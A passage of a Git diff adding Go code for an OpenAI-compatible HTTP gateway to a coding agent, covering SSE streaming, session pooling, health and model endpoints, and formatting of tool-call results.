+		compat := *model.Compat
+		copy.Compat = &compat
+	}
+	return &copy
+}
+
+func (s *Server) handleStreamingResponse(w http.ResponseWriter, r *http.Request, eventCh <-chan agent.Event, modelID, sessionID string) {
+	sse := NewSSEWriter(w, modelID, sessionID)
+	sse.WriteRoleDelta()
+
+	toolMode := s.cfg.ToolVisibility.Mode
+	toolDetail := s.cfg.GetToolDetail()
+	var totalUsage CompletionUsage
+	var xToolCalls []XToolCall
+	// Track in-flight tool calls by callID so we can attach result/diff on end.
+	pendingTools := make(map[string]*toolCallInfo)
+
+	for ev := range eventCh {
+		select {
+		case <-r.Context().Done():
+			return
+		default:
+		}
+
+		switch ev.Type {
+		case agent.EventTextDelta:
+			sse.WriteContentDelta(ev.TextDelta)
+
+		case agent.EventToolCall:
+			name, callID := resolveToolEvent(ev)
+			tc := &toolCallInfo{Name: name, Args: ev.ToolArgs, Status: "running"}
+			if callID != "" {
+				pendingTools[callID] = tc
+			}
+			xToolCalls = append(xToolCalls, XToolCall{Name: name, Args: ev.ToolArgs, Status: "running"})
+			switch toolMode {
+			case "content":
+				sse.WriteContentDelta(formatToolRunning(name, ev.ToolArgs))
+			case "sse_event":
+				sse.WriteToolStatusEvent(name, "running", ev.ToolArgs)
+			}
+
+		case agent.EventToolExecutionEnd:
+			status := "completed"
+			if ev.ToolError != nil {
+				status = "failed"
+			}
+			// Update xToolCalls status
+			for i := len(xToolCalls) - 1; i >= 0; i-- {
+				if xToolCalls[i].Name == ev.ToolName && xToolCalls[i].Status == "running" {
+					xToolCalls[i].Status = status
+					break
+				}
+			}
+			// Build expanded output
+			tc := pendingTools[ev.ToolCallID]
+			if tc == nil {
+				tc = &toolCallInfo{Name: ev.ToolName, Args: ev.ToolArgs}
+			}
+			tc.Status = status
+			tc.Result = ev.ToolResult
+			tc.Diff = ev.ToolDiff
+			tc.Error = ev.ToolError
+			delete(pendingTools, ev.ToolCallID)
+
+			switch toolMode {
+			case "content":
+				sse.WriteToolResult(tc, toolDetail)
+			case "sse_event":
+				sse.WriteToolStatusEvent(ev.ToolName, status, nil)
+			}
+
+		case agent.EventUsage:
+			if ev.Usage != nil {
+				totalUsage.PromptTokens += ev.Usage.TotalInputTokens()
+				totalUsage.CompletionTokens += ev.Usage.Output
+				totalUsage.TotalTokens = totalUsage.PromptTokens + totalUsage.CompletionTokens
+			}
+
+		case agent.EventDone:
+			sse.WriteDone(&totalUsage)
+			return
+
+		case agent.EventError:
+			if ev.Error != nil {
+				sse.WriteError(ev.Error.Error())
+			} else {
+				sse.WriteDone(&totalUsage)
+			}
+			return
+		}
+	}
+	// Channel closed without EventDone
+	sse.WriteDone(&totalUsage)
+}
+
+func (s *Server) handleNonStreamingResponse(w http.ResponseWriter, eventCh <-chan agent.Event, modelID, sessionID string) {
+	var sb strings.Builder
+	var totalUsage CompletionUsage
+	var xToolCalls []XToolCall
+	toolMode := s.cfg.ToolVisibility.Mode
+	toolDetail := s.cfg.GetToolDetail()
+	pendingTools := make(map[string]*toolCallInfo)
+
+	for ev := range eventCh {
+		switch ev.Type {
+		case agent.EventTextDelta:
+			sb.WriteString(ev.TextDelta)
+
+		case agent.EventToolCall:
+			name, callID := resolveToolEvent(ev)
+			tc := &toolCallInfo{Name: name, Args: ev.ToolArgs, Status: "running"}
+			if callID != "" {
+				pendingTools[callID] = tc
+			}
+			xToolCalls = append(xToolCalls, XToolCall{Name: name, Args: ev.ToolArgs, Status: "running"})
+
+		case agent.EventToolExecutionEnd:
+			status := "completed"
+			if ev.ToolError != nil {
+				status = "failed"
+			}
+			for i := len(xToolCalls) - 1; i >= 0; i-- {
+				if xToolCalls[i].Name == ev.ToolName && xToolCalls[i].Status == "running" {
+					xToolCalls[i].Status = status
+					break
+				}
+			}
+			// Build expanded output for content/none mode
+			tc := pendingTools[ev.ToolCallID]
+			if tc == nil {
+				tc = &toolCallInfo{Name: ev.ToolName, Args: ev.ToolArgs}
+			}
+			tc.Status = status
+			tc.Result = ev.ToolResult
+			tc.Diff = ev.ToolDiff
+			tc.Error = ev.ToolError
+			delete(pendingTools, ev.ToolCallID)
+
+			if toolMode == "content" {
+				sb.WriteString(formatToolResult(tc, toolDetail))
+			}
+
+		case agent.EventUsage:
+			if ev.Usage != nil {
+				totalUsage.PromptTokens += ev.Usage.TotalInputTokens()
+				totalUsage.CompletionTokens += ev.Usage.Output
+				totalUsage.TotalTokens = totalUsage.PromptTokens + totalUsage.CompletionTokens
+			}
+
+		case agent.EventError:
+			if ev.Error != nil {
+				writeError(w, http.StatusInternalServerError, ev.Error.Error(), "server_error")
+				return
+			}
+		}
+	}
+
+	finishReason := "stop"
+	resp := ChatCompletionResponse{
+		ID:      newCompletionID(),
+		Object:  "chat.completion",
+		Created: time.Now().Unix(),
+		Model:   modelID,
+		Choices: []ChatCompletionChoice{
+			{
+				Index:        0,
+				Message:      &ResponseMessage{Role: "assistant", Content: sb.String()},
+				FinishReason: &finishReason,
+			},
+		},
+		Usage:      &totalUsage,
+		XSessionID: sessionID,
+		XToolCalls: xToolCalls,
+	}
+	writeJSON(w, http.StatusOK, resp)
+}
+
+func (s *Server) writeCommandResponse(w http.ResponseWriter, result *CommandResult, modelID, sessionID, cmd string) {
+	finishReason := "stop"
+	resp := ChatCompletionResponse{
+		ID:      newCommandCompletionID(),
+		Object:  "chat.completion",
+		Created: time.Now().Unix(),
+		Model:   modelID,
+		Choices: []ChatCompletionChoice{
+			{
+				Index:        0,
+				Message:      &ResponseMessage{Role: "assistant", Content: result.Message},
+				FinishReason: &finishReason,
+			},
+		},
+		Usage:      &CompletionUsage{},
+		XSessionID: sessionID,
+		XCommand:   strings.Fields(cmd)[0],
+	}
+	writeJSON(w, http.StatusOK, resp)
+}
+
+func (s *Server) writeCommandResponseStreaming(w http.ResponseWriter, result *CommandResult, modelID, sessionID, cmd string) {
+	sse := NewSSEWriter(w, modelID, sessionID)
+	sse.WriteRoleDelta()
+	sse.WriteContentDelta(result.Message)
+	sse.WriteDone(&CompletionUsage{})
+}
+
+// getOrCreateSession returns an existing session or creates a new one.
+func (s *Server) getOrCreateSession(sessionID, workDir string) *GatewaySession {
+	if sessionID != "" {
+		if sess := s.pool.Get(sessionID); sess != nil {
+			return sess
+		}
+	}
+
+	// Create new session
+	mgr := session.New(workDir, s.settings.GetSessionDir())
+	if sessionID != "" {
+		if err := mgr.InitWithID(sessionID); err != nil {
+			// Fallback to auto-generated ID
+			if err := mgr.Init(); err != nil {
+				return nil
+			}
+		}
+	} else {
+		if err := mgr.Init(); err != nil {
+			return nil
+		}
+	}
+
+	id := sessionID
+	if id == "" && mgr.GetHeader() != nil {
+		id = mgr.GetHeader().ID
+	}
+
+	registry := tools.NewRegistry(workDir, s.sandboxMgr.GetActive())
+	registry.RegisterDefaultsWithPlanTool(s.settings.IsPlanToolEnabled())
+	if s.skillsMgr != nil {
+		registry.Register(tools.NewSkillRefTool(s.skillsMgr))
+	}
+
+	sess := &GatewaySession{
+		ID:       id,
+		WorkDir:  workDir,
+		Manager:  mgr,
+		Registry: registry,
+		Mode:     "",
+		LastUsed: time.Now(),
+	}
+
+	// Create sub-agent manager if enabled
+	if s.cfg.EnableSubAgents {
+		compactionSettings := ctxpkg.CompactionSettings{
+			Enabled:          s.settings.Compaction.Enabled,
+			ReserveTokens:    s.settings.Compaction.ReserveTokens,
+			KeepRecentTokens: s.settings.Compaction.KeepRecentTokens,
+		}
+		factory := agent.NewAgentFactory(s.provider, s.model, s.settings, s.sandboxMgr, s.extraContext, compactionSettings, nil)
+		sess.AgentMgr = agent.NewAgentManager(factory)
+	}
+
+	if err := s.pool.Put(sess); err != nil {
+		return nil
+	}
+
+	// If this session was created without a client-supplied ID,
+	// remember it as the default so subsequent empty x_session_id
+	// requests reuse the same session.
+	if sessionID == "" {
+		s.mu.Lock()
+		if s.defaultSessionID == "" {
+			s.defaultSessionID = sess.ID
+		}
+		s.mu.Unlock()
+	}
+
+	return sess
+}
+
+// parseMessages extracts the last user message, system messages, and history messages.
+func parseMessages(msgs []RequestMessage) (lastUser string, systemMsgs []string, history []RequestMessage) {
+	for _, m := range msgs {
+		switch m.Role {
+		case "system":
+			systemMsgs = append(systemMsgs, m.Content)
+		}
+	}
+
+	// Find the last user message
+	lastIdx := -1
+	for i := len(msgs) - 1; i >= 0; i-- {
+		if msgs[i].Role == "user" {
+			lastIdx = i
+			break
+		}
+	}
+	if lastIdx < 0 {
+		return "", systemMsgs, nil
+	}
+	lastUser = msgs[lastIdx].Content
+
+	// Everything before the last user message (excluding system) is history
+	for i := 0; i < lastIdx; i++ {
+		if msgs[i].Role != "system" {
+			history = append(history, msgs[i])
+		}
+	}
+	return lastUser, systemMsgs, history
+}
+
+// convertHistoryMessages converts OpenAI-format history to internal provider.Message.
+func convertHistoryMessages(msgs []RequestMessage) []provider.Message {
+	result := make([]provider.Message, 0, len(msgs))
+	for _, m := range msgs {
+		switch m.Role {
+		case "user":
+			result = append(result, provider.NewUserMessage(m.Content))
+		case "assistant":
+			result = append(result, provider.NewAssistantMessage([]provider.ContentBlock{
+				{Type: "text", Text: m.Content},
+			}))
+		}
+	}
+	return result
+}
+
+// resolveToolEvent extracts tool name and call ID from an agent event,
+// falling back to ToolCall fields when top-level fields are empty.
+func resolveToolEvent(ev agent.Event) (name string, callID string) {
+	name = ev.ToolName
+	callID = ev.ToolCallID
+	if ev.ToolCall != nil {
+		if name == "" {
+			name = ev.ToolCall.Name
+		}
+		if callID == "" {
+			callID = ev.ToolCall.ID
+		}
+	}
+	return name, callID
+}
diff --git a/internal/gateway/handler_health.go b/internal/gateway/handler_health.go
new file mode 100644
index 0000000..1c71312
--- /dev/null
+++ b/internal/gateway/handler_health.go
@@ -0,0 +1,17 @@
+package gateway
+
+import "net/http"
+
+func (s *Server) handleHealth(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodGet {
+		writeError(w, http.StatusMethodNotAllowed, "method not allowed", "invalid_request_error")
+		return
+	}
+
+	resp := HealthResponse{
+		Status:   "ok",
+		Version:  s.version,
+		Sessions: s.pool.Count(),
+	}
+	writeJSON(w, http.StatusOK, resp)
+}
diff --git a/internal/gateway/handler_models.go b/internal/gateway/handler_models.go
new file mode 100644
index 0000000..8fff498
--- /dev/null
+++ b/internal/gateway/handler_models.go
@@ -0,0 +1,30 @@
+package gateway
+
+import (
+	"net/http"
+	"time"
+)
+
+func (s *Server) handleModels(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodGet {
+		writeError(w, http.StatusMethodNotAllowed, "method not allowed", "invalid_request_error")
+		return
+	}
+
+	models := s.provider.Models()
+	items := make([]ModelItem, 0, len(models))
+	for _, m := range models {
+		items = append(items, ModelItem{
+			ID:      m.ID,
+			Object:  "model",
+			Created: time.Now().Unix(),
+			OwnedBy: "vibecoding",
+		})
+	}
+
+	resp := ModelListResponse{
+		Object: "list",
+		Data:   items,
+	}
+	writeJSON(w, http.StatusOK, resp)
+}
diff --git a/internal/gateway/session_mgr.go b/internal/gateway/session_mgr.go
new file mode 100644
index 0000000..56387fc
--- /dev/null
+++ b/internal/gateway/session_mgr.go
@@ -0,0 +1,145 @@
+package gateway
+
+import (
+	"sync"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/session"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// GatewaySession holds state for a single gateway session.
+type GatewaySession struct {
+	ID       string
+	WorkDir  string
+	Manager  *session.Manager
+	Registry *tools.Registry
+	AgentMgr *agent.AgentManager // nil unless sub-agents enabled
+	Mode     string             // session-level mode override
+	LastUsed time.Time
+	mu       sync.Mutex // serializes requests within this session
+
+	// ForceCompact is set by /compact command and consumed by the next agent run.
+	ForceCompact bool
+}
+
+// Lock acquires the session lock (one request at a time per session).
+func (s *GatewaySession) Lock()   { s.mu.Lock() }
+// Unlock releases the session lock.
+func (s *GatewaySession) Unlock() { s.mu.Unlock() }
+
+// Touch updates the last-used timestamp.
+func (s *GatewaySession) Touch() { s.LastUsed = time.Now() }
+
+// SessionPool manages multiple concurrent gateway sessions.
+type SessionPool struct {
+	mu       sync.RWMutex
+	sessions map[string]*GatewaySession
+	maxSess  int
+	idleTTL  time.Duration
+	stopCh   chan struct{}
+}
+
+// NewSessionPool creates a session pool.
+func NewSessionPool(maxSessions int, idleTimeout time.Duration) *SessionPool {
+	p := &SessionPool{
+		sessions: make(map[string]*GatewaySession),
+		maxSess:  maxSessions,
+		idleTTL:  idleTimeout,
+		stopCh:   make(chan struct{}),
+	}
+	if idleTimeout > 0 {
+		go p.cleanupLoop()
+	}
+	return p
+}
+
+// Get returns an existing session by ID, or nil.
+func (p *SessionPool) Get(id string) *GatewaySession {
+	p.mu.RLock()
+	defer p.mu.RUnlock()
+	return p.sessions[id]
+}
+
+// Put adds a session to the pool. Returns an error if the pool is at capacity.
+func (p *SessionPool) Put(s *GatewaySession) error {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	if p.maxSess > 0 && len(p.sessions) >= p.maxSess {
+		// Check if we have an existing entry (replace is OK)
+		if _, exists := p.sessions[s.ID]; !exists {
+			return &PoolFullError{Max: p.maxSess}
+		}
+	}
+	s.Touch()
+	p.sessions[s.ID] = s
+	return nil
+}
+
+// Remove removes a session by ID.
+func (p *SessionPool) Remove(id string) {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	delete(p.sessions, id)
+}
+
+// Count returns the number of active sessions.
+func (p *SessionPool) Count() int {
+	p.mu.RLock()
+	defer p.mu.RUnlock()
+	return len(p.sessions)
+}
+
+// List returns all session IDs.
+func (p *SessionPool) List() []string {
+	p.mu.RLock()
+	defer p.mu.RUnlock()
+	ids := make([]string, 0, len(p.sessions))
+	for id := range p.sessions {
+		ids = append(ids, id)
+	}
+	return ids
+}
+
+// Stop shuts down the cleanup goroutine.
+func (p *SessionPool) Stop() {
+	close(p.stopCh)
+}
+
+// cleanupLoop periodically removes idle sessions.
+func (p *SessionPool) cleanupLoop() {
+	ticker := time.NewTicker(60 * time.Second)
+	defer ticker.Stop()
+	for {
+		select {
+		case <-p.stopCh:
+			return
+		case <-ticker.C:
+			p.evictIdle()
+		}
+	}
+}
+
+func (p *SessionPool) evictIdle() {
+	if p.idleTTL <= 0 {
+		return
+	}
+	now := time.Now()
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	for id, s := range p.sessions {
+		if now.Sub(s.LastUsed) > p.idleTTL {
+			delete(p.sessions, id)
+		}
+	}
+}
+
+// PoolFullError is returned when the session pool is at capacity.
+type PoolFullError struct {
+	Max int
+}
+
+func (e *PoolFullError) Error() string {
+	return "session pool is at capacity"
+}
diff --git a/internal/gateway/streaming.go b/internal/gateway/streaming.go
new file mode 100644
index 0000000..dee2399
--- /dev/null
+++ b/internal/gateway/streaming.go
@@ -0,0 +1,160 @@
+package gateway
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"time"
+)
+
+// SSEWriter helps write Server-Sent Events to an HTTP response.
+type SSEWriter struct {
+	w       http.ResponseWriter
+	flusher http.Flusher
+	model   string
+	id      string
+	created int64
+	sessID  string
+}
+
+// NewSSEWriter creates an SSE writer and sets the appropriate headers.
+func NewSSEWriter(w http.ResponseWriter, model, sessionID string) *SSEWriter {
+	w.Header().Set("Content-Type", "text/event-stream")
+	w.Header().Set("Cache-Control", "no-cache")
+	w.Header().Set("Connection", "keep-alive")
+	w.Header().Set("X-Accel-Buffering", "no") // disable nginx buffering
+
+	flusher, _ := w.(http.Flusher)
+
+	id := newCompletionID()
+	return &SSEWriter{
+		w:       w,
+		flusher: flusher,
+		model:   model,
+		id:      id,
+		created: time.Now().Unix(),
+		sessID:  sessionID,
+	}
+}
+
+// WriteContentDelta sends a text content delta chunk.
+func (s *SSEWriter) WriteContentDelta(content string) {
+	chunk := ChatCompletionChunk{
+		ID:      s.id,
+		Object:  "chat.completion.chunk",
+		Created: s.created,
+		Model:   s.model,
+		Choices: []ChatCompletionChoice{
+			{
+				Index: 0,
+				Delta: &ResponseMessage{Content: content},
+			},
+		},
+		XSessionID: s.sessID,
+	}
+	s.writeData(chunk)
+}
+
+// WriteRoleDelta sends the initial role delta.
+func (s *SSEWriter) WriteRoleDelta() {
+	chunk := ChatCompletionChunk{
+		ID:      s.id,
+		Object:  "chat.completion.chunk",
+		Created: s.created,
+		Model:   s.model,
+		Choices: []ChatCompletionChoice{
+			{
+				Index: 0,
+				Delta: &ResponseMessage{Role: "assistant"},
+			},
+		},
+		XSessionID: s.sessID,
+	}
+	s.writeData(chunk)
+}
+
+// WriteToolStatusContent sends a tool status in content mode (text in content delta).
+// Uses a compact title like "read: path=main.go" rather than dumping full args.
+func (s *SSEWriter) WriteToolStatusContent(title, status string) {
+	text := fmt.Sprintf("[%s] %s\n", status, title)
+	s.WriteContentDelta(text)
+}
+
+// WriteToolResult sends formatted tool output based on detail level.
+func (s *SSEWriter) WriteToolResult(tc *toolCallInfo, detail string) {
+	text := formatToolResult(tc, detail)
+	s.WriteContentDelta(text)
+}
+
+// WriteToolStatusEvent sends a tool status as an SSE event (sse_event mode).
+func (s *SSEWriter) WriteToolStatusEvent(toolName, status string, args map[string]any) {
+	evt := ToolStatusEvent{
+		Tool:   toolName,
+		Status: status,
+		Args:   args,
+	}
+	data, _ := json.Marshal(evt)
+	fmt.Fprintf(s.w, "event: tool_status\ndata: %s\n\n", data)
+	if s.flusher != nil {
+		s.flusher.Flush()
+	}
+}
+
+// WriteDone sends the final chunk with finish_reason and usage, then [DONE].
+func (s *SSEWriter) WriteDone(usage *CompletionUsage) {
+	finishReason := "stop"
+	chunk := ChatCompletionChunk{
+		ID:      s.id,
+		Object:  "chat.completion.chunk",
+		Created: s.created,
+		Model:   s.model,
+		Choices: []ChatCompletionChoice{
+			{
+				Index:        0,
+				Delta:        &ResponseMessage{},
+				FinishReason: &finishReason,
+			},
+		},
+		Usage:      usage,
+		XSessionID: s.sessID,
+	}
+	s.writeData(chunk)
+
+	// Send [DONE] sentinel
+	fmt.Fprintf(s.w, "data: [DONE]\n\n")
+	if s.flusher != nil {
+		s.flusher.Flush()
+	}
+}
+
+// WriteError sends an error as a final chunk.
+func (s *SSEWriter) WriteError(errMsg string) {
+	finishReason := "stop"
+	chunk := ChatCompletionChunk{
+		ID:      s.id,
+		Object:  "chat.completion.chunk",
+		Created: s.created,
+		Model:   s.model,
+		Choices: []ChatCompletionChoice{
+			{
+				Index:        0,
+				Delta:        &ResponseMessage{Content: "\n\n[Error: " + errMsg + "]"},
+				FinishReason: &finishReason,
+			},
+		},
+		XSessionID: s.sessID,
+	}
+	s.writeData(chunk)
+	fmt.Fprintf(s.w, "data: [DONE]\n\n")
+	if s.flusher != nil {
+		s.flusher.Flush()
+	}
+}
+
+func (s *SSEWriter) writeData(v any) {
+	data, _ := json.Marshal(v)
+	fmt.Fprintf(s.w, "data: %s\n\n", data)
+	if s.flusher != nil {
+		s.flusher.Flush()
+	}
+}
diff --git a/internal/gateway/tool_format.go b/internal/gateway/tool_format.go
new file mode 100644
index 0000000..73d4de1
--- /dev/null
+++ b/internal/gateway/tool_format.go
@@ -0,0 +1,302 @@
+package gateway
+
+import (
+	"fmt"
+	"path/filepath"
+	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// toolCallInfo tracks a tool call through its lifecycle.
+type toolCallInfo struct {
+	Name   string
+	Args   map[string]any
+	Result string
+	Diff   *tools.FileDiff
+	Error  error
+	Status string // "running", "completed", "failed"
+}
+
+// formatToolResult dispatches to collapsed or expanded based on detail level.
+// detail: "collapsed" (default) or "expanded"
+func formatToolResult(tc *toolCallInfo, detail string) string {
+	if detail == "expanded" {
+		return formatToolExpanded(tc)
+	}
+	return formatToolCollapsed(tc)
+}
+
+// formatToolCollapsed renders a one-line summary.
+// Most tools: 🔧 `read` main.go ✅
+// edit/write with diff: always shows path + diff (never fully collapsed)
+// Errors: always shown
+func formatToolCollapsed(tc *toolCallInfo) string {
+	var sb strings.Builder
+
+	// Errors are always shown in full
+	if tc.Error != nil {
+		sb.WriteString(formatToolHeaderMD(tc.Name, tc.Args))
+		sb.WriteString("\n\n")
+		sb.WriteString(fmt.Sprintf("> ❌ Error: %v\n\n", tc.Error))
+		return sb.String()
+	}
+
+	// edit/write with diff — always show path + diff
+	if (tc.Name == "edit" || tc.Name == "write") && tc.Diff != nil && tc.Diff.Unified != "" {
+		sb.WriteString(formatToolHeaderMD(tc.Name, tc.Args))
+		sb.WriteString("\n\n")
+		sb.WriteString(fmt.Sprintf("```diff\n%s", tc.Diff.Unified))
+		if !strings.HasSuffix(tc.Diff.Unified, "\n") {
+			sb.WriteString("\n")
+		}
+		sb.WriteString("```\n\n")
+		return sb.String()
+	}
+
+	// Everything else: one-line summary
+	status := "✅"
+	if tc.Status == "failed" {
+		status = "❌"
+	}
+	sb.WriteString(formatToolHeaderMD(tc.Name, tc.Args))
+	sb.WriteString(" ")
+	sb.WriteString(status)
+	sb.WriteString("\n\n")
+	return sb.String()
+}
+
+// formatToolExpanded renders a tool call with full output in code fences.
+func formatToolExpanded(tc *toolCallInfo) string {
+	var sb strings.Builder
+
+	sb.WriteString(formatToolHeaderMD(tc.Name, tc.Args))
+	sb.WriteString("\n\n")
+
+	// Error
+	if tc.Error != nil {
+		sb.WriteString(fmt.Sprintf("> ❌ Error: %v\n\n", tc.Error))
+		return sb.String()
+	}
+
+	// Diff output (edit/write with diff)
+	if tc.Diff != nil && tc.Diff.Unified != "" {
+		sb.WriteString(fmt.Sprintf("```diff\n%s", tc.Diff.Unified))
+		if !strings.HasSuffix(tc.Diff.Unified, "\n") {
+			sb.WriteString("\n")
+		}
+		sb.WriteString("```\n\n")
+		return sb.String()
+	}
+
+	// Result output
+	if tc.Result != "" {
+		lang := inferCodeLang(tc.Name, tc.Args)
+		sb.WriteString(fmt.Sprintf("```%s\n%s", lang, tc.Result))
+		if !strings.HasSuffix(tc.Result, "\n") {
+			sb.WriteString("\n")
+		}
+		sb.WriteString("```\n\n")
+	}
+
+	return sb.String()
+}
+
+// formatToolHeaderMD builds the tool header line.
+// Uses plain text with emoji prefix — no markdown formatting to avoid
+// rendering issues when streamed in chunks.
+func formatToolHeaderMD(name string, args map[string]any) string {
+	keyArg := toolKeyArg(name, args)
+	if keyArg == "" {
+		return fmt.Sprintf("🔧 %s", name)
+	}
+	return fmt.Sprintf("🔧 %s: %s", name, keyArg)
+}
+
+// formatToolRunning returns a status line when a tool starts executing.
+func formatToolRunning(name string, args map[string]any) string {
+	keyArg := toolKeyArg(name, args)
+	if keyArg == "" {
+		return fmt.Sprintf("⏳ %s running...\n\n", name)
+	}
+	return fmt.Sprintf("⏳ %s: %s\n\n", name, keyArg)
+}
+
+// formatToolHeader builds the header line (used by SSE content status).
+func formatToolHeader(name string, args map[string]any) string {
+	keyArg := toolKeyArg(name, args)
+	if keyArg == "" {
+		return fmt.Sprintf("🔧 [%s]", name)
+	}
+	return fmt.Sprintf("🔧 [%s] %s", name, keyArg)
+}
+
+// --- Language inference ---
+
+// inferCodeLang guesses the code fence language from tool name and args.
+func inferCodeLang(toolName string, args map[string]any) string {
+	switch toolName {
+	case "bash":
+		return "bash"
+	case "read", "write":
+		if path, ok := args["path"].(string); ok {
+			return langFromPath(path)
+		}
+	case "grep", "find", "ls":
+		return "" // plain text
+	}
+	return ""
+}
+
+// langFromPath infers a code fence language from a file extension.
+func langFromPath(path string) string {
+	ext := strings.ToLower(filepath.Ext(path))
+	switch ext {
+	case ".go":
+		return "go"
+	case ".py":
+		return "python"
+	case ".js":
+		return "javascript"
+	case ".ts":
+		return "typescript"
+	case ".tsx":
+		return "tsx"
+	case ".jsx":
+		return "jsx"
+	case ".rs":
+		return "rust"
+	case ".rb":
+		return "ruby"
+	case ".java":
+		return "java"
+	case ".c", ".h":
+		return "c"
+	case ".cpp", ".cc", ".cxx", ".hpp":
+		return "cpp"
+	case ".cs":
+		return "csharp"
+	case ".swift":
+		return "swift"
+	case ".kt", ".kts":
+		return "kotlin"
+	case ".sh", ".bash":
+		return "bash"
+	case ".zsh":
+		return "zsh"
+	case ".ps1":
+		return "powershell"
+	case ".sql":
+		return "sql"
+	case ".html", ".htm":
+		return "html"
+	case ".css":
+		return "css"
+	case ".scss":
+		return "scss"
+	case ".json":
+		return "json"
+	case ".jsonc":
+		return "jsonc"
+	case ".yaml", ".yml":
+		return "yaml"
+	case ".toml":
+		return "toml"
+	case ".xml":
+		return "xml"
+	case ".md", ".markdown":
+		return "markdown"
+	case ".dockerfile":
+		return "dockerfile"
+	case ".tf":
+		return "hcl"
+	case ".lua":
+		return "lua"
+	case ".r":
+		return "r"
+	case ".php":
+		return "php"
+	case ".pl", ".pm":
+		return "perl"
+	case ".ex", ".exs":
+		return "elixir"
+	case ".erl":
+		return "erlang"
+	case ".hs":
+		return "haskell"
+	case ".scala":
+		return "scala"
+	case ".clj":
+		return "clojure"
+	case ".vim":
+		return "vim"
+	case ".proto":
+		return "protobuf"
+	case ".graphql", ".gql":
+		return "graphql"
+	case ".ini", ".cfg", ".conf":
+		return "ini"
+	case ".env":
+		return "bash"
+	case ".makefile":
+		return "makefile"
+	default:
+		base := strings.ToLower(filepath.Base(path))
+		switch base {
+		case "makefile", "gnumakefile":
+			return "makefile"
+		case "dockerfile":
+			return "dockerfile"
+		case "vagrantfile", "gemfile":
+			return "ruby"
+		}
+		return ""
+	}
+}
+
+// --- Key arg extraction ---
+
+// toolKeyArg extracts the most relevant argument for display.
+func toolKeyArg(name string, args map[string]any) string {
+	if args == nil {
+		return ""
+	}
+	switch name {
+	case "bash":
+		if cmd, ok := args["command"].(string); ok {
+			if len(cmd) > 120 {
+				return cmd[:120] + "..."
+			}
+			return cmd
+		}
+	case "read", "write", "edit", "ls":
+		if path, ok := args["path"].(string); ok {
+			return path
+		}
+	case "grep":
+		var parts []string
+		if pattern, ok := args["pattern"].(string); ok {
+			parts = append(parts, pattern)
+		}
+		if path, ok := args["path"].(string); ok {
+			parts = append(parts, path)
+		}
+		return strings.Join(parts, " ")
+	case "find":
+		var parts []string
+		if pattern, ok := args["pattern"].(string); ok {
+			parts = append(parts, pattern)
+		}
+		if path, ok := args["path"].(string); ok {
+			parts = append(parts, path)
+		}
+		return strings.Join(parts, " ")
+	default:
+		for _, key := range []string{"path", "command", "pattern", "query", "name"} {
+			if v, ok := args[key].(string); ok && v != "" {
+				return v
+			}
+		}
+	}
+	return ""
+}
diff --git a/internal/gateway/types.go b/internal/gateway/types.go
new file mode 100644
index 0000000..bfed1cb
--- /dev/null
+++ b/internal/gateway/types.go
@@ -0,0 +1,158 @@
+package gateway
+
+import (
+	"encoding/json"
+	"fmt"
+	"time"
+)
+
+// --- OpenAI-compatible request types ---
+
+// ChatCompletionRequest represents the OpenAI chat completions request.
+type ChatCompletionRequest struct {
+	Model       string           `json:"model,omitempty"`
+	Messages    []RequestMessage `json:"messages"`
+	Stream      bool             `json:"stream,omitempty"`
+	Temperature *float64         `json:"temperature,omitempty"`
+	TopP        *float64         `json:"top_p,omitempty"`
+	MaxTokens   int              `json:"max_tokens,omitempty"`
+
+	// VibeCoding extensions
+	XSessionID  string `json:"x_session_id,omitempty"`
+	XMode       string `json:"x_mode,omitempty"`
+	XWorkingDir string `json:"x_working_dir,omitempty"`
+}
+
+// RequestMessage represents a message in the OpenAI request.
+type RequestMessage struct {
+	Role    string `json:"role"`
+	Content string `json:"content"`
+	Name    string `json:"name,omitempty"`
+}
+
+// --- OpenAI-compatible response types ---
+
+// ChatCompletionResponse is the non-streaming response.
+type ChatCompletionResponse struct {
+	ID      string                   `json:"id"`
+	Object  string                   `json:"object"`
+	Created int64                    `json:"created"`
+	Model   string                   `json:"model"`
+	Choices []ChatCompletionChoice   `json:"choices"`
+	Usage   *CompletionUsage         `json:"usage,omitempty"`
+
+	// VibeCoding extensions
+	XSessionID string         `json:"x_session_id,omitempty"`
+	XCommand   string         `json:"x_command,omitempty"`
+	XToolCalls []XToolCall    `json:"x_tool_calls,omitempty"`
+}
+
+// ChatCompletionChoice is a single choice in the response.
+type ChatCompletionChoice struct {
+	Index        int              `json:"index"`
+	Message      *ResponseMessage `json:"message,omitempty"`
+	Delta        *ResponseMessage `json:"delta,omitempty"`
+	FinishReason *string          `json:"finish_reason"`
+}
+
+// ResponseMessage is the assistant's response message.
+type ResponseMessage struct {
+	Role    string `json:"role,omitempty"`
+	Content string `json:"content,omitempty"`
+}
+
+// CompletionUsage tracks token counts.
+type CompletionUsage struct {
+	PromptTokens     int `json:"prompt_tokens"`
+	CompletionTokens int `json:"completion_tokens"`
+	TotalTokens      int `json:"total_tokens"`
+}
+
+// XToolCall is a VibeCoding extension for exposing tool call info.
+type XToolCall struct {
+	Name   string         `json:"name"`
+	Args   map[string]any `json:"args,omitempty"`
+	Status string         `json:"status"` // "running", "completed", "failed"
+}
+
+// --- Streaming chunk types ---
+
+// ChatCompletionChunk is the streaming chunk response.
+type ChatCompletionChunk struct {
+	ID      string                 `json:"id"`
+	Object  string                 `json:"object"`
+	Created int64                  `json:"created"`
+	Model   string                 `json:"model"`
+	Choices []ChatCompletionChoice `json:"choices"`
+	Usage   *CompletionUsage       `json:"usage,omitempty"`
+
+	// VibeCoding extensions
+	XSessionID string `json:"x_session_id,omitempty"`
+}
+
+// --- SSE tool_status event (for sse_event mode) ---
+
+// ToolStatusEvent is sent via SSE event: tool_status.
+type ToolStatusEvent struct {
+	Tool   string         `json:"tool"`
+	Status string         `json:"status"` // "running", "completed", "failed"
+	Args   map[string]any `json:"args,omitempty"`
+}
+
+// --- Model list types ---
+
+// ModelListResponse is the response for GET /v1/models.
+type ModelListResponse struct {
+	Object string      `json:"object"`
